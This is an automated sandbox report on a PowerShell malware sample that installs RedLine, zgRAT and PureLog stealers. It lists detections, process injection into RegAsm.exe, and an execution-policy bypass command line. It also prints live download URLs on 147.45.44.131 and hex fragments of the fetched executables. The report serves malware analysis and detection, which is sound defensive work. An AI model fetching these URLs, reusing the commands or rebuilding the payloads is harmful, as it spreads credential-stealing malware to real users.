Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TST.ps1

Overview

General Information

Sample name:TST.ps1
Analysis ID:1518260
MD5:34261ad4c802d025f6ead9dd56634860
SHA1:45e6e38e7b2f9b9d3529ede907cf40e4f5ab7c3e
SHA256:27bd8666cfbd715fe61a6b97294c7f4f6b15e61aefc65ebe91a77e4d5c8e74fa
Tags:147-45-44-131ps1user-JAMESWT_MHT
Infos:

Detection

PureLog Stealer, RedLine, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected PureLog Stealer
Yara detected RUNPE
Yara detected RedLine Stealer
Yara detected zgRAT
.NET source code references suspicious native API functions
AI detected suspicious sample
Injects a PE file into a foreign processes
Suspicious execution chain found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Downloads executable code via HTTP
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • powershell.exe (PID: 6324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TST.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 5252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegAsm.exe (PID: 1952 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 3532 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.2236665088.000002C3EF2E0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_RUNPEYara detected RUNPEJoe Security
    00000003.00000002.2213531087.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000000.00000002.2206077558.000002C3D70F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RUNPEYara detected RUNPEJoe Security
        00000000.00000002.2206077558.000002C3D84A6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RUNPEYara detected RUNPEJoe Security
          00000000.00000002.2206077558.000002C3D84B3000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RUNPEYara detected RUNPEJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            0.2.powershell.exe.2c3ef2e0000.8.raw.unpackJoeSecurity_RUNPEYara detected RUNPEJoe Security
              0.2.powershell.exe.2c3d84acbf0.3.raw.unpackJoeSecurity_RUNPEYara detected RUNPEJoe Security
                0.2.powershell.exe.2c3d84a6ca4.2.raw.unpackJoeSecurity_RUNPEYara detected RUNPEJoe Security
                  3.2.RegAsm.exe.400000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                    3.2.RegAsm.exe.400000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      Click to see the 12 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TST.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TST.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TST.ps1", ProcessId: 6324, ProcessName: powershell.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TST.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TST.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\TST.ps1", ProcessId: 6324, ProcessName: powershell.exe
                      Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 3532, ProcessName: svchost.exe
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2024-09-25T14:49:33.017016+020028033053Unknown Traffic192.168.2.649711147.45.44.13180TCP

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: http://147.45.44.131/files/mservice64.exeAvira URL Cloud: Label: malware
                      Source: http://147.45.44.131/files/TTF.exeAvira URL Cloud: Label: malware
                      Source: TST.ps1ReversingLabs: Detection: 18%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: Binary string: C:\Users\Administrator\Desktop\RunPe-Link\RunPE\obj\Release\RunPE.pdb source: powershell.exe, 00000000.00000002.2206077558.000002C3D70F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2236665088.000002C3EF2E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D84B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D84A6000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

                      Software Vulnerabilities

                      barindex
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 25 Sep 2024 12:49:32 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 12 Aug 2024 11:56:41 GMTETag: "3400-61f7b2fb281f0"Accept-Ranges: bytesContent-Length: 13312Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 59 36 0c fa 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 2a 00 00 00 08 00 00 00 00 00 00 4a 49 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 f6 48 00 00 4f 00 00 00 00 60 00 00 8c 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 0c 00 00 00 60 48 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 50 29 00 00 00 20 00 00 00 2a 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 8c 05 00 00 00 60 00 00 00 06 00 00 00 2c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 00 00 00 02 00 00 00 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2a 49 00 00 00 00 00 00 48 00 00 00 02 00 05 00 68 29 00 00 f8 1e 00 00 03 00 02 00 08 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 02 00 37 00 00 00 01 00 00 11 12 00 28 16 00 00 0a 7d 0f 00 00 04 12 00 02 7d 10 00 00 04 12 00 15 7d 0e 00 00 04 12 00 7c 0f 00 00 04 12 00 28 01 00 00 2b 12 00 7c 0f 00 00 04 28 18 00 00 0a 2a 1e 02 28 19 00 00 0a 2a 2e 73 1a 00 00 0a 80 01 00 00 04 2a aa 02 72 01 00 00 70 28 1b 00 00 0a 2d 0f 02 72 09 00 00 70 28 1b 00 00 0a 2d 08 2b 0c 72 17 00 00 70 2a 72 89 00 00 70 2a 14 2a 1e 02 28 19 00 00 0a 2a 00 00 13 30 02 00 2f 00 00 00 02 00 00 11 12 00 28 1c 00 00 0a 7d 13 00 00 04 12 00 15 7d 12 00 00 04 12 00 7c 13 00 00 04 12 00 28 02 00 00 2b 12 00 7c 13 00 00 04 28 1e 00 00 0a 2a 1e 02 28 19 00 00 0a 2a 00 13 30 01 00 13 00 00 00 03 00 00 11 28 06 00 00 06 6f 1f 00 00 0a 0a 12 00 28 20 00 00 0a 2a ce d0 26 00 00 01 28 21 00 00 0a 72 cb 00 00 70 28 22 00 00 0a 14 18 8d 10 00 00 01 25 16 02 a2 25 17 03 8c 28 00 00 01 a2 6f 23 00 00 0a a5 2a 00 00 01 2a ce d0 26 00 00 01 28 21 00 00 0a 72 d
                      Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 25 Sep 2024 12:49:32 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 12 Aug 2024 11:55:19 GMTETag: "a7000-61f7b2acc379e"Accept-Ranges: bytesContent-Length: 684032Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6a 65 30 a0 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 62 0a 00 00 0c 00 00 00 00 00 00 8e 81 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 81 0a 00 4b 00 00 00 00 a0 0a 00 34 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 61 0a 00 00 20 00 00 00 62 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 34 09 00 00 00 a0 0a 00 00 0a 00 00 00 64 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 6e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 81 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 30 4e 06 00 70 bf 03 00 03 00 00 00 40 05 00 06 a0 0d 0a 00 a1 26 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 00 00 2e 28 03 00 00 06 28 04 00 00 06 2a 1e 00 28 65 05 00 06 2a 1e 00 28 01 00 00 06 2a 1b 30 09 00 ce 05 00 00 01 00 00 11 00 73 0d 00 00 0a 0a 00 00 02 7e 05 00 00 04 25 3a 17 00 00 00 26 7e 04 00 00 04 fe 06 2b 00 00 06 73 0e 00 00 0a 25 80 05 00 00 04 28 01 00 00 2b 6f 10 00 00 0a 0b 38 5b 05 00 00 07 6f 11 00 00 0a 0c 00 08 17 17 1a 8d 0b 00 00 01 25 16 1f 46 7e b1 03 00 04 28 e4 09 00 06 a2 25 17 1f 47 7e b1 03 00 04 28 e4 09 00 06 a2 25 18 1f 48 7e b1 03 00 04 28 e4 09 00 06 a2 25 19 1f 65 7e b1 03 00 04 28 e4 09 00 06 a2 7e b2 03 00 04 28 e8 09 00 06 0d 00 09 6f 12 00 00 0a 13 04 38 d4 04 00 00 12 04 28 13 00 00 0a 13 05 73 1f 00 00 06 13 06 00 73 40 04 00 06 13 07 11 06 7e 14 00 00 0a 7d 02 00 00 04 7e 14 00 00 0a 13 08 00 11 06 11 05 73 15 00 00 0a 28 16 00 00 0a 6f 17 00 00 0a 7d 02 00 00 04 11 06 7b 02 00 00 04 1f 49 7e b1 03 00 04 28 e4 09 00 06 6f 18 00 00 0a 13 09 11 09 39 15 00 00 00 00 1f 49 7e b1 03 00 04 28 e4 09 00 06 13 0
                      Source: global trafficHTTP traffic detected: GET /files/TTF.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/mservice64.exe HTTP/1.1Host: 147.45.44.131
                      Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49711 -> 147.45.44.131:80
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.131
                      Source: global trafficHTTP traffic detected: GET /files/TTF.exe HTTP/1.1Host: 147.45.44.131Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /files/mservice64.exe HTTP/1.1Host: 147.45.44.131
                      Source: RegAsm.exe, 00000003.00000002.2218088489.000000000326A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                      Source: RegAsm.exe, 00000003.00000002.2218088489.000000000326A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)
                      Source: RegAsm.exe, 00000003.00000002.2218088489.000000000326A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: IndexedDB\https_www.youtube.com_0.indexeddb.leveldb`, equals www.youtube.com (Youtube)
                      Source: RegAsm.exe, 00000003.00000002.2218088489.000000000326A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q#www.youtube.com_0.indexeddb.leveldb equals www.youtube.com (Youtube)
                      Source: RegAsm.exe, 00000003.00000002.2218088489.000000000326A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q3IndexedDB\https_www.youtube.com_0.indexeddb.leveldb@\ equals www.youtube.com (Youtube)
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D7B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D84B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D7B91000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D6ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D7B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/files
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D6ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/files/TTF.exe
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D84B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D84A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.131/files/mservice64.exe
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D7B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44XBk
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D849E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.H
                      Source: svchost.exe, 00000005.00000002.3412377270.0000021AB1C00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acocfkfsx7alydpzevdxln7drwdq_117.0.5938.134/117.0.5
                      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                      Source: qmgr.db.5.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                      Source: edb.log.5.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                      Source: powershell.exe, 00000000.00000002.2229665328.000002C3E6D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D8717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D6ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D6CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D8564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D6ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D6CB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: RegAsm.exe, 00000003.00000002.2218088489.000000000317E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.s
                      Source: RegAsm.exe, 00000003.00000002.2218088489.000000000317E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D8717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D8717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D8717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: RegAsm.exe, 00000003.00000002.2218088489.00000000032C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/v9/users/
                      Source: edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/Prod1C:
                      Source: svchost.exe, 00000005.00000003.2211936578.0000021AB19E0000.00000004.00000800.00020000.00000000.sdmp, edb.log.5.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV21C:
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D6ED8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D7B91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                      Source: powershell.exe, 00000000.00000002.2229665328.000002C3E6D1F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2206077558.000002C3D8717000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D8564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                      Source: powershell.exe, 00000000.00000002.2206077558.000002C3D8564000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                      Source: RegAsm.exe, 00000003.00000002.2218088489.0000000003407000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: GetRawInputDatamemstr_35cdbbf0-3

                      System Summary

                      barindex
                      Source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 0.2.powershell.exe.2c3e6fc8f00.7.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                      Source: 0.2.powershell.exe.2c3e6fc8f00.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
